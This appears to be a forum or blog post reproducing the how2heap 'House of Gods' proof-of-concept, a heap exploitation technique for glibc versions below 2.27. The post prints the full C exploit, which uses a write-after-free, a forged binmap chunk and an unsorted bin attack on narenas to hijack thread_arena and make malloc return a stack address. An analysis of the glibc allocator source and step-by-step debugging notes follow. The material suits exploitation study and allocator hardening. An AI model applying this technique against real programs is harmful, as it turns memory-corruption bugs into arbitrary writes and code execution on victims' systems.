house of gods
Last edited by R00tkit at 2023-10-28 07:56

# house_of_gods
This is a rather interesting exploitation technique against `glibc < 2.27`. Searching for `house of gods` turns up no online writeups of this technique, so this post rounds out the earlier how2heap series.
## 源码
```cpp
/* House of Gods PoC */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <inttypes.h>
/*
* Welcome to the House of Gods...
*
* House of Gods is an arena hijacking technique for glibc < 2.27. It supplies
* the attacker with an arbitrary write against the thread_arena symbol of
* the main thread. This can be used to replace the main_arena with a
* carefully crafted fake arena. The exploit was tested against
*
* - glibc-2.23
* - glibc-2.24
* - glibc-2.25
* - glibc-2.26
*
* Following requirements are mandatory
*
* - 8 allocs of arbitrary size to hijack the arena (+2 for ACE)
* - control over first 5 quadwords of a chunk's userdata
* - a single write-after-free bug on an unsorted chunk
* - heap address leak + libc address leak
*
* This PoC demonstrates how to leverage the House of Gods in order to hijack
 * the thread_arena. But it won't explain how to escalate further to
* arbitrary code execution, since this step is trivial once the whole arena
* is under control.
*
 * Also note that the how2heap PoC might use more allocations than
* previously stated. This is intentional and has educational purposes.
*
* If you want to read the full technical description of this technique, going
* from zero to arbitrary code execution within only 10 to 11 allocations, here
* is the original document I've written
*
* https://github.com/Milo-D/house-of-gods/blob/master/rev2/HOUSE_OF_GODS.TXT
*
* I recommend reading this document while experimenting with
* the how2heap PoC.
*
* Besides that, this technique abuses a minor bug in glibc, which I have
* already submitted to bugzilla at
*
* https://sourceware.org/bugzilla/show_bug.cgi?id=29709
*
* AUTHOR: David Milosevic (milo)
*
* */
/* <--- Exploit PoC ---> */
int main(void) {
printf("=================\n");
printf("= House of Gods =\n");
printf("=================\n\n");
printf("=== Abstract ===\n\n");
printf("The core of this technique is to allocate a fakechunk overlapping\n");
printf("the binmap field within the main_arena. This fakechunk is located at\n");
printf("offset 0x850. Its sizefield can be crafted by carefully binning chunks\n");
printf("into smallbins or largebins. The binmap-chunk is then being linked into\n");
printf("the unsorted bin via a write-after-free bug in order to allocate it back\n");
printf("as an exact fit. One can now tamper with the main_arena.next pointer at\n");
printf("offset 0x868 and inject the address of a fake arena. A final unsorted bin\n");
printf("attack corrupts the narenas variable with a very large value. From there, only\n");
printf("two more allocation requests for at least 0xffffffffffffffc0 bytes of memory\n");
printf("are needed to trigger two consecutive calls to the reused_arena() function,\n");
printf("which in turn traverses the corrupted arena-list and sets thread_arena to the\n");
printf("address stored in main_arena.next - the address of the fake arena.\n\n");
printf("=== PoC ===\n\n");
printf("Okay, so let us start by allocating some chunks...\n\n");
/*
* allocate a smallchunk, for example a 0x90-chunk.
* */
void *SMALLCHUNK = malloc(0x88);
/*
* allocate the first fastchunk. We will use
* a 0x20-chunk for this purpose.
* */
void *FAST20 = malloc(0x18);
/*
* allocate a second fastchunk. This time
* a 0x40-chunk.
* */
void *FAST40 = malloc(0x38);
printf("%p is our 0x90-sized smallchunk. We will bin this chunk to forge a\n", SMALLCHUNK);
printf("fake sizefield for our binmap-chunk.\n\n");
printf("%p is our first fastchunk. Its size is 0x20.\n\n", FAST20);
printf("%p is our second fastchunk with a size of 0x40. The usecase of\n", FAST40);
printf("both fastchunks will be explained later in this PoC.\n\n");
printf("We can move our smallchunk to the unsorted bin by simply free'ing it...\n\n");
/*
* put SMALLCHUNK into the unsorted bin.
* */
free(SMALLCHUNK);
/*
* this is a great opportunity to simulate a
* libc leak. We just read the address of the
* unsorted bin and save it for later.
* */
const uint64_t leak = *((uint64_t*) SMALLCHUNK);
printf("And now we need to make a request for a chunk which can not be serviced by\n");
printf("our recently free'd smallchunk. Thus, we will make a request for a\n");
printf("0xa0-sized chunk - let us call this chunk INTM (intermediate).\n\n");
/*
* following allocation will trigger a binning
* process within the unsorted bin and move
* SMALLCHUNK to the 0x90-smallbin.
* */
void *INTM = malloc(0x98);
printf("Our smallchunk should be now in the 0x90-smallbin. This process also triggered\n");
printf("the mark_bin(m, i) macro within the malloc source code. If you inspect the\n");
printf("main_arena's binmap located at offset 0x855, you will notice that the initial\n");
printf("value of the binmap changed from 0x0 to 0x200 - which can be used as a valid\n");
printf("sizefield to bypass the unsorted bin checks.\n\n");
printf("We would also need a valid bk pointer in order to bypass the partial unlinking\n");
printf("procedure within the unsorted bin. But luckily, the main_arena.next pointer at\n");
printf("offset 0x868 points initially to the start of the main_arena itself. This fact\n");
printf("makes it possible to pass the partial unlinking without segfaulting.\n\n");
printf("So now that we have crafted our binmap-chunk, it is time to allocate it\n");
printf("from the unsorted bin. For that, we will abuse a write-after-free bug\n");
printf("on an unsorted chunk. Let us start...\n\n");
printf("First, allocate another smallchunk...\n");
/*
* recycle our previously binned smallchunk.
 * Note that it is not necessary to recycle this
* chunk. I am doing it only to keep the heap layout
* small and compact.
* */
SMALLCHUNK = malloc(0x88);
printf("...and now move our new chunk to the unsorted bin...\n");
/*
* put SMALLCHUNK into the unsorted bin.
* */
free(SMALLCHUNK);
printf("...in order to tamper with the free'd chunk's bk pointer.\n\n");
/*
* bug: a single write-after-free bug on an
* unsorted chunk is enough to initiate the
* House of Gods technique.
* */
*((uint64_t*) (SMALLCHUNK + 0x8)) = leak + 0x7f8;
printf("Great. We have redirected the unsorted bin to our binmap-chunk.\n");
printf("But we also have corrupted the bin. Let's fix this, by redirecting\n");
printf("a second time.\n\n");
printf("The next chunk (head->bk->bk->bk) in the unsorted bin is located at the start\n");
printf("of the main-arena. We will abuse this fact and free a 0x20-chunk and a 0x40-chunk\n");
printf("in order to forge a valid sizefield and bk pointer. We will also let the 0x40-chunk\n");
printf("point to another allocated chunk (INTM) by writing to its bk pointer before\n");
printf("actually free'ing it.\n\n");
/*
* before free'ing those chunks, let us write
* the address of another chunk to the currently
* unused bk pointer of FAST40. We can reuse
* the previously requested INTM chunk for that.
*
 * Free'ing FAST40 won't reset the bk pointer, thus
* we can let it point to an allocated chunk while
* having it stored in one of the fastbins.
*
* The reason behind this, is the simple fact that
* we will need to perform an unsorted bin attack later.
* And we can not request a 0x40-chunk to trigger the
* partial unlinking, since a 0x40 request will be serviced
* from the fastbins instead of the unsorted bin.
* */
*((uint64_t*) (FAST40 + 0x8)) = (uint64_t) (INTM - 0x10);
/*
* and now free the 0x20-chunk in order to forge a sizefield.
* */
free(FAST20);
/*
* and the 0x40-chunk in order to forge a bk pointer.
* */
free(FAST40);
printf("Okay. The unsorted bin should now look like this\n\n");
printf("head -> SMALLCHUNK -> binmap -> main-arena -> FAST40 -> INTM\n");
printf(" bk bk bk bk bk\n\n");
printf("The binmap attack is nearly done. The only thing left to do, is\n");
printf("to make a request for a size that matches the binmap-chunk's sizefield.\n\n");
/*
* all the hard work finally pays off...we can
* now allocate the binmap-chunk from the unsorted bin.
* */
void *BINMAP = malloc(0x1f8);
printf("After allocating the binmap-chunk, the unsorted bin should look similar to this\n\n");
printf("head -> main-arena -> FAST40 -> INTM\n");
printf(" bk bk bk\n\n");
printf("And that is a binmap attack. We've successfully gained control over a small\n");
printf("number of fields within the main-arena. Two of them are crucial for\n");
printf("the House of Gods technique\n\n");
printf(" -> main_arena.next\n");
printf(" -> main_arena.system_mem\n\n");
printf("By tampering with the main_arena.next field, we can manipulate the arena's\n");
printf("linked list and insert the address of a fake arena. Once this is done,\n");
printf("we can trigger two calls to malloc's reused_arena() function.\n\n");
printf("The purpose of the reused_arena() function is to return a non-corrupted,\n");
printf("non-locked arena from the arena linked list in case that the current\n");
printf("arena could not handle previous allocation request.\n\n");
printf("The first call to reused_arena() will traverse the linked list and return\n");
printf("a pointer to the current main-arena.\n\n");
printf("The second call to reused_arena() will traverse the linked list and return\n");
printf("a pointer to the previously injected fake arena (main_arena.next).\n\n");
printf("We can reach the reused_arena() if we meet following conditions\n\n");
printf(" - exceeding the total amount of arenas a process can have.\n");
printf(" malloc keeps track by using the narenas variable as\n");
printf(" an arena counter. If this counter exceeds the limit (narenas_limit),\n");
printf(" it will start to reuse existing arenas from the arena list instead\n");
printf(" of creating new ones. Luckily, we can set narenas to a very large\n");
printf(" value by performing an unsorted bin attack against it.\n\n");
printf(" - force the malloc algorithm to ditch the current arena.\n");
printf(" When malloc notices a failure it will start a second allocation\n");
printf(" attempt with a different arena. We can mimic an allocation failure by\n");
printf(" simply requesting too much memory i.e. 0xffffffffffffffc0 and greater.\n\n");
printf("Let us start with the unsorted bin attack. We load the address of narenas\n");
printf("minus 0x10 into the bk pointer of the currently allocated INTM chunk...\n\n");
/*
* set INTM's bk to narenas-0x10. This will
* be our target for the unsorted bin attack.
* */
*((uint64_t*) (INTM + 0x8)) = leak - 0xa40;
printf("...and then manipulate the main_arena.system_mem field in order to pass the\n");
printf("size sanity checks for the chunk overlapping the main-arena.\n\n");
/*
* this way we can abuse a heap pointer
* as a valid sizefield.
* */
*((uint64_t*) (BINMAP + 0x20)) = 0xffffffffffffffff;
printf("The unsorted bin should now look like this\n\n");
printf("head -> main-arena -> FAST40 -> INTM -> narenas-0x10\n");
printf(" bk bk bk bk\n\n");
printf("We can now trigger the unsorted bin attack by requesting the\n");
printf("INTM chunk as an exact fit.\n\n");
/*
* request the INTM chunk from the unsorted bin
* in order to trigger a partial unlinking between
* head and narenas-0x10.
* */
INTM = malloc(0x98);
printf("Perfect. narenas is now set to the address of the unsorted bin's head\n");
printf("which should be large enough to exceed the existing arena limit.\n\n");
printf("Let's proceed with the manipulation of the main_arena.next pointer\n");
printf("within our previously allocated binmap-chunk. The address we write\n");
printf("to this field will become the future value of thread_arena.\n\n");
/*
* set main_arena.next to an arbitrary address. The
* next two calls to malloc will overwrite thread_arena
* with the same address. I'll reuse INTM as fake arena.
*
* Note, that INTM is not suitable as fake arena but
* nevertheless, it is an easy way to demonstrate that
* we are able to set thread_arena to an arbitrary address.
* */
*((uint64_t*) (BINMAP + 0x8)) = (uint64_t) (INTM - 0x10);
printf("Done. Now all what's left to do is to trigger two calls to the reused_arena()\n");
printf("function by making two requests for an invalid chunksize.\n\n");
/*
* the first call will force the reused_arena()
* function to set thread_arena to the address of
* the current main-arena.
* */
malloc(0xffffffffffffffbf + 1);
/*
* the second call will force the reused_arena()
* function to set thread_arena to the address stored
* in main_arena.next - our fake arena.
* */
malloc(0xffffffffffffffbf + 1);
printf("We did it. We hijacked the thread_arena symbol and from now on memory\n");
printf("requests will be serviced by our fake arena. Let's check this out\n");
printf("by allocating a fakechunk on the stack from one of the fastbins\n");
printf("of our new fake arena.\n\n");
/*
* construct a 0x70-fakechunk on the stack...
* */
uint64_t fakechunk[4] = {
0x0000000000000000, 0x0000000000000073,
0x4141414141414141, 0x0000000000000000
};
/*
* ...and place it in the 0x70-fastbin of our fake arena
* */
*((uint64_t*) (INTM + 0x20)) = (uint64_t) (fakechunk);
printf("Fakechunk in position at stack address %p\n", fakechunk);
printf("Target data within the fakechunk at address %p\n", &fakechunk[2]);
printf("Its current value is %#lx\n\n", fakechunk[2]);
printf("And after requesting a 0x70-chunk...\n");
/*
* use the fake arena to perform arbitrary allocations
* */
void *FAKECHUNK = malloc(0x68);
printf("...malloc returns us the fakechunk at %p\n\n", FAKECHUNK);
printf("Overwriting the newly allocated chunk changes the target\n");
printf("data as well: ");
/*
* overwriting the target data
* */
*((uint64_t*) (FAKECHUNK)) = 0x4242424242424242;
printf("%#lx\n", fakechunk[2]);
/*
* confirm success
* */
assert(fakechunk[2] == 0x4242424242424242);
return EXIT_SUCCESS;
}
```
## Prerequisites
First, a quick look at what `binmap` is used for.
```cpp
struct malloc_state
{
[...]
/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];
/* Linked list */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
```
`binmap` is modified at two points during `malloc`:
1. While sweeping the unsorted bin, a free chunk that gets sorted into its corresponding small bin or large bin has the matching `binmap` bit set:
```cpp
mark_bin(av, victim_index);
#define mark_bin(m, i) ((m)->binmap |= idx2bit(i))
```
2. While searching the small and large bins for a free chunk at least as large as the request, a bin whose `binmap` bit is set but which turns out to be empty has its bit cleared:
```cpp
av->binmap = map &= ~bit;
```
## Debugging
First allocate `SMALLCHUNK_0x90`, `FASTCHUNK_0x20`, and `FASTCHUNK_0x40` in that order, then free `SMALLCHUNK_0x90` into the unsorted bin.
Next request `SMALLCHUNK_0xa0` (`INTM`). This triggers the first binmap-modifying scenario, changing `binmap` from `0x0` to `0x200`, which we will reuse as the `fake_chunk_size`; call the fake chunk containing `binmap` `BINMAP`. `SMALLCHUNK_0x90` is also moved into the `0x90` small bin.
Then re-allocate `SMALLCHUNK_0x90` and free it into the unsorted bin again. Use the write-after-free bug to point `SMALLCHUNK_0x90.bk` at the tail of `main_arena.bins`, i.e. the `fake_chunk_prevsize` of `BINMAP`. Next point `FASTCHUNK_0x40.bk` at `INTM` (the `SMALLCHUNK_0xa0`), then free `FASTCHUNK_0x20` and `FASTCHUNK_0x40`. The freed `FASTCHUNK_0x20` lands exactly where the sizefield of the fake chunk overlapping `main_arena` sits, ensuring that fake chunk's size is larger than `2 * SIZE_SZ`. The unsorted bin now looks like this.
_(Because `binmap` is an array of 4-byte `unsigned int`s, `fake_chunk_binmap.bk` coincides with the `next` field, which initially points to `&main_arena`.)_
`head.bk -> SMALLCHUNK_0x90.bk -> BINMAP.bk -> main-arena.bk -> FASTCHUNK_0x40.bk -> INTM`
Requesting a `0x1f8`-sized chunk now allocates `BINMAP` as an exact fit. Next, consider how to switch the arena over to a forged one. In `__libc_malloc`, the arena is obtained via `arena_get`; expanding the macro shows that it actually just reads `thread_arena`:
```cpp
#define arena_get(ptr, size) \
do { \
ptr = thread_arena; \
arena_lock(ptr, size); \
} while (0)
```
After `arena_get` obtains an arena, `_int_malloc` is called to attempt the allocation; if it returns `NULL`, `arena_get_retry` followed by another `_int_malloc` retries the allocation:
```cpp
arena_get(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
if (!victim && ar_ptr != NULL) {
LIBC_PROBE(memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
}
```
Since our arena is `main_arena`, `arena_get_retry` actually ends up calling `arena_get2`:
```cpp
static mstate
arena_get_retry(mstate ar_ptr, size_t bytes) {
LIBC_PROBE(memory_arena_retry, 2, bytes, ar_ptr);
if (ar_ptr != &main_arena) {
...
} else {
(void) mutex_unlock(&ar_ptr->mutex);
ar_ptr = arena_get2(bytes, ar_ptr);
}
return ar_ptr;
}
```
In `arena_get2`, if `n <= narenas_limit - 1`, `_int_new_arena` is called to create a new arena; otherwise `reused_arena` picks a usable arena from the existing list:
```cpp
static mstate internal_function arena_get2(size_t size, mstate avoid_arena) {
mstate a;
static size_t narenas_limit;
a = get_free_list(); // debugging shows this returns NULL here
if (a == NULL) {
/* Nothing immediately available, so generate a new arena.*/
if (narenas_limit == 0) {
if (mp_.arena_max != 0)
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test) {
int n = __get_nprocs();
if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES(n);
else
/* We have no information about the system. Assume two
cores. */
narenas_limit = NARENAS_FROM_NCORES(2);
}
}
repeat:;
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK. If arena_max
is set the value of arena_test is irrelevant. If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0. There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas. */
if (__glibc_unlikely(n <= narenas_limit - 1)) {
if (catomic_compare_and_exchange_bool_acq(&narenas, n + 1, n))
goto repeat;
a = _int_new_arena(size);
if (__glibc_unlikely(a == NULL))
catomic_decrement(&narenas);
} else
a = reused_arena(avoid_arena);
}
return a;
}
```
`reused_arena` walks the `arena.next` list starting at `next_to_use`, picks the first arena that satisfies `!arena_is_corrupt(result) && !mutex_trylock(&result->mutex)`, assigns it to `thread_arena`, and then advances `next_to_use` to the next arena:
```cpp
static size_t narenas = 1;
static mstate
reused_arena(mstate avoid_arena) {
mstate result;
/* FIXME: Access to next_to_use suffers from data races.*/
static mstate next_to_use;
if (next_to_use == NULL)
next_to_use = &main_arena;
/* Iterate over all arenas (including those linked from
free_list).*/
result = next_to_use;
do {
if (!arena_is_corrupt(result) && !mutex_trylock(&result->mutex))
goto out;
/* FIXME: This is a data race, see _int_new_arena.*/
result = result->next;
} while (result != next_to_use);
...
out:
...
thread_arena = result;
next_to_use = result->next;
return result;
}
```
Therefore we can point `main_arena.next` at the forged arena and then call `malloc(0xffffffffffffffbf + 1)` twice (after the first call, `result == &main_arena` and `next_to_use == INTM`). The `checked_request2size(bytes, nb);` macro makes `_int_malloc` return `NULL` each time, so in the end `thread_arena` points at our forged arena.
First we must ensure `narenas > narenas_limit - 1` so that the `reused_arena` branch is taken, which is why we mount an unsorted bin attack to turn `narenas` into a huge value. To make sure the chunk pulled from the unsorted bin passes the `victim->size > av->system_mem` sanity check, we set `main_arena.system_mem` to `0xffffffffffffffff`. Then point `INTM.bk` at `&narenas - 0x10` to stage the unsorted bin attack.
Requesting a `0xa0`-sized chunk (allocating the `INTM` we planted in the unsorted bin) triggers the unsorted bin attack: `narenas` is overwritten with `&main_arena.top`, the address of the unsorted bin's head.
Point `main_arena.next` at `INTM`, then issue `malloc(0xffffffffffffffbf + 1);` twice in a row so that `thread_arena` ends up pointing at our forged `INTM` arena.
Forge a fastchunk as in the PoC: a `0x70`-sized fakechunk on the stack.
Then write the fakechunk's address to `(uint64_t*) (INTM_prev + 0x30)`, the `0x70` fastbin slot of the fake arena.
Now a `malloc(0x68)` hands back the memory at the target address.